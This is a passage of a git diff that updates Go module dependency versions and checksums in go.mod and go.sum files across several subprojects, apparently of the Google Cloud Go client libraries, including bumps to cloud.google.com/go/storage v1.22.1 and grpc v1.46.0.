h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220414192740-2d67ff6cf2b4/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= diff --git a/go.mod b/go.mod index 9f02f4bd2c..8c8a17de45 100644 --- a/go.mod +++ b/go.mod @@ -4,7 +4,7 @@ go 1.15 require ( cloud.google.com/go/compute v1.6.1 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.8 github.com/google/martian/v3 v3.2.1 diff --git a/go.sum b/go.sum index d405d8d117..d17d9aa715 100644 --- a/go.sum +++ b/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -162,6 +162,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -561,7 +562,6 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220414192740-2d67ff6cf2b4/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= diff --git a/internal/godocfx/go.mod b/internal/godocfx/go.mod index 61b6f8deeb..c96a309d14 100644 --- a/internal/godocfx/go.mod +++ b/internal/godocfx/go.mod @@ -6,7 +6,7 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/bigquery v1.31.0 cloud.google.com/go/datastore v1.6.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/google/go-cmp v0.5.8 github.com/yuin/goldmark v1.4.11 golang.org/x/sync v0.0.0-20210220032951-036812b2e83c diff --git a/internal/godocfx/go.sum b/internal/godocfx/go.sum index 17edfcec5b..6332babe33 100644 --- a/internal/godocfx/go.sum +++ b/internal/godocfx/go.sum @@ -12,8 +12,9 @@ cloud.google.com/go/datastore v1.6.0 h1:wZaHIqu1tebvGRYhVgcfNX6jN2q638OGO23JyJck cloud.google.com/go/datastore v1.6.0/go.mod h1:q3ZJj1GMQRdU0OCv5XXpCqfLqHHZnI5zcumkvuYDmHI= cloud.google.com/go/iam v0.3.0 h1:exkAomrVUuzx9kWFI1wm3KI0uoDeUFPB4kKGzx6x+Gc= cloud.google.com/go/iam v0.3.0/go.mod h1:XzJPvDayI+9zsASAFO68Hk07u3z+f+JrT2xXNdp4bnY= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU= github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= @@ -75,6 +76,7 @@ github.com/google/go-cmp v0.5.8 h1:e6P7q2lk1O+qJJb4BtCQXlK8vWEO8V1ZeuEdJNOqZyg= github.com/google/go-cmp v0.5.8/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/martian/v3 v3.2.1 h1:d8MncMlErDFTwQGBK1xhv026j9kqhvw1Qv9IbWT1VLQ= github.com/google/martian/v3 v3.2.1/go.mod h1:oBOf6HBosgwRXnUGWUB05QECsc6uvmMiJ3+6W4l/CUk= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.1.0/go.mod h1:Q3nei7sK6ybPYH7twZdmQpAd1MKb7pfu6SK+H1/DsU0= diff --git a/logging/go.mod b/logging/go.mod index 70ba523c03..940f500be7 100644 --- a/logging/go.mod +++ b/logging/go.mod @@ -6,14 +6,14 @@ require ( cloud.google.com/go v0.100.2 cloud.google.com/go/compute v1.6.0 cloud.google.com/go/iam v0.3.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/protobuf v1.5.2 github.com/google/go-cmp v0.5.7 github.com/googleapis/gax-go/v2 v2.3.0 go.opencensus.io v0.23.0 golang.org/x/oauth2 v0.0.0-20220411215720-9780585627b5 google.golang.org/api v0.74.0 - google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 - google.golang.org/grpc v1.45.0 + google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 + google.golang.org/grpc v1.46.0 google.golang.org/protobuf v1.28.0 ) diff --git a/logging/go.sum b/logging/go.sum index 97e30ead5b..5e5ac84b62 100644 --- a/logging/go.sum +++ b/logging/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -73,6 +73,7 @@ github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod h1:6pvJx4me5XP github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= @@ -83,6 +84,7 @@ github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.m github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.2-0.20220325020618-49ff273808a1/go.mod h1:KJwIaB5Mv44NWtYuAOFCVOjcI94vtpEz2JU/D2v6IjE= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= @@ -159,6 +161,7 @@ github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -438,8 +441,9 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f h1:GGU+dLjvlC3qDwqYgL6UgRmHXhOOgns0bZu2Ty5mm6U= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= @@ -552,10 +556,10 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= -google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 h1:XGQ6tc+EnM35IAazg4y6AHmUg4oK8NXsXaILte1vRlk= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 h1:2D0OT6tPVdrQTOnVe1VQjfJPTED6EZ7fdJ/f6Db6OsY= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335/go.mod h1:RAyBrSAP7Fh3Nc84ghnVLDPuV51xc9agzmm4Ph6i0Q4= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -583,8 +587,9 @@ google.golang.org/grpc v1.39.1/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnD google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.44.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/grpc v1.45.0 h1:NEpgUqV3Z+ZjkqMsxMg11IaDrXY4RY6CQukSGK0uI1M= google.golang.org/grpc v1.45.0/go.mod h1:lN7owxKUQEqMfSyQikvvk5tf/6zMPsrK+ONuO11+0rQ= +google.golang.org/grpc v1.46.0 h1:oCjezcn6g6A75TGoKYBPgKmVBLexhYLM6MebdrPApP8= +google.golang.org/grpc v1.46.0/go.mod h1:vN9eftEi1UMyUsIF80+uQXhHjbXYbm0uXoFCACuMGWk= google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= diff --git a/profiler/go.mod b/profiler/go.mod index 76dd4fef14..ecb9c1fc18 100644 --- a/profiler/go.mod +++ b/profiler/go.mod @@ -5,13 +5,13 @@ go 1.16 require ( cloud.google.com/go v0.100.2 cloud.google.com/go/compute v1.6.0 - cloud.google.com/go/storage v1.22.0 + cloud.google.com/go/storage v1.22.1 github.com/golang/mock v1.6.0 github.com/golang/protobuf v1.5.2 github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f github.com/googleapis/gax-go/v2 v2.3.0 golang.org/x/oauth2 v0.0.0-20220411215720-9780585627b5 google.golang.org/api v0.74.0 - google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 - google.golang.org/grpc v1.45.0 + google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 + google.golang.org/grpc v1.46.0 ) diff --git a/profiler/go.sum b/profiler/go.sum index bc0966daad..8696aa3bce 100644 --- a/profiler/go.sum +++ b/profiler/go.sum @@ -52,8 +52,8 @@ cloud.google.com/go/storage v1.5.0/go.mod h1:tpKbwo567HUNpVclU5sGELwQWBDZ8gh0Zeo cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohlUTyfDhBk= cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= -cloud.google.com/go/storage v1.22.0 h1:NUV0NNp9nkBuW66BFRLuMgldN60C57ET3dhbwLIYio8= -cloud.google.com/go/storage v1.22.0/go.mod h1:GbaLEoMqbVm6sx3Z0R++gSiBlgMv6yUi2q1DeGFKQgE= +cloud.google.com/go/storage v1.22.1 h1:F6IlQJZrZM++apn9V5/VfS3gbTUYg98PS3EMQAzqtfg= +cloud.google.com/go/storage v1.22.1/go.mod h1:S8N1cAStu7BOeFfE8KAQzmyyLkK8p/vmRq6kuBTW58Y= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= @@ -73,6 +73,7 @@ github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4/go.mod h1:6pvJx4me5XP github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210805033703-aa0b78936158/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20210922020428-25de7278fc84/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= +github.com/cncf/xds/go v0.0.0-20211001041855-01bcc9b48dfe/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= @@ -83,6 +84,7 @@ github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.m github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/go-control-plane v0.9.10-0.20210907150352-cf90f659a021/go.mod h1:AFq3mo9L8Lqqiid3OhADV3RfLJnjiw63cSpi+fDTRC0= +github.com/envoyproxy/go-control-plane v0.10.2-0.20220325020618-49ff273808a1/go.mod h1:KJwIaB5Mv44NWtYuAOFCVOjcI94vtpEz2JU/D2v6IjE= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= @@ -161,6 +163,7 @@ github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLe github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f h1:VrKTY4lquiy1oJzVZgXrauku9Jx9P+POv/gTLakG4Wk= github.com/google/pprof v0.0.0-20220412212628-83db2b799d1f/go.mod h1:Pt31oes+eGImORns3McJn8zHefuQl2rG8l6xQjGYB4U= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= @@ -441,8 +444,9 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f h1:GGU+dLjvlC3qDwqYgL6UgRmHXhOOgns0bZu2Ty5mm6U= +golang.org/x/xerrors v0.0.0-20220411194840-2f41105eb62f/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= @@ -555,10 +559,10 @@ google.golang.org/genproto v0.0.0-20220222213610-43724f9ea8cf/go.mod h1:kGP+zUP2 google.golang.org/genproto v0.0.0-20220304144024-325a89244dc8/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220310185008-1973136f34c6/go.mod h1:kGP+zUP2Ddo0ayMi4YuN7C3WZyJvGLZRh8Z5wnAqvEI= google.golang.org/genproto v0.0.0-20220324131243-acbaeb5b85eb/go.mod h1:hAL49I2IFola2sVEjAn7MEwsja0xp51I0tlGAf9hz4E= -google.golang.org/genproto v0.0.0-20220405205423-9d709892a2bf/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= google.golang.org/genproto v0.0.0-20220407144326-9054f6ed7bac/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= -google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9 h1:XGQ6tc+EnM35IAazg4y6AHmUg4oK8NXsXaILte1vRlk= google.golang.org/genproto v0.0.0-20220413183235-5e96e2839df9/go.mod h1:8w6bsBMX6yCPbAVTeqQHvzxW0EIFigd5lZyahWgyfDo= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335 h1:2D0OT6tPVdrQTOnVe1VQjfJPTED6EZ7fdJ/f6Db6OsY= +google.golang.org/genproto v0.0.0-20220518221133-4f43b3371335/go.mod h1:RAyBrSAP7Fh3Nc84ghnVLDPuV51xc9agzmm4Ph6i0Q4= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod 